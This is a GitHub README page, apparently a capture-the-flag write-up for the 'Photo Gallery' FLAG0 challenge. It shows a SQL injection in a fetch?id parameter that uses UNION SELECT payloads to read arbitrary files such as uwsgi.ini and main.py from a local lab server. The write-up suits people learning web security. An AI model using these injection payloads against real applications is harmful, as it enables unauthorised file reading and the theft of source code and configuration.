Skip to content

Latest commit

 

History

History

flag0

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
imgs
imgs
 
 
README.md
README.md
 
 
main.py
main.py
 
 

README.md

Photo Gallery - FLAG0

0x00 Check Image Source

Based on FLAG1, when fetching an image id, it will return an image from the files directory.

http://127.0.0.1/xxxxxxxxxx/fetch?id=1

id title parent filename
1 Utterly adorable 1 files/adorable.jpg
2 Purrfect 1 files/purrfect.jpg
3 Invisible 1 FLAG1

0x01 Arbitrary File Read

Normally id is integer, so decimal may make an error here.

fetch?id=1.1

So when do UNION SELECT with the image name, it loads the image 1 again.

id=1.1 UNION SELECT 'files/adorable.jpg' --

0x02 uwsgi-nginx-flask-docker

The hint shows the application run on uwsgi-nginx-flask-docker. So the configuration file is uwsgi.ini

id=1.1 UNION SELECT 'uwsgi.ini' --

The file shows

[uwsgi] module = main callable = app

And the main file

id=1.1 UNION SELECT 'main.py' --

Can check the main.py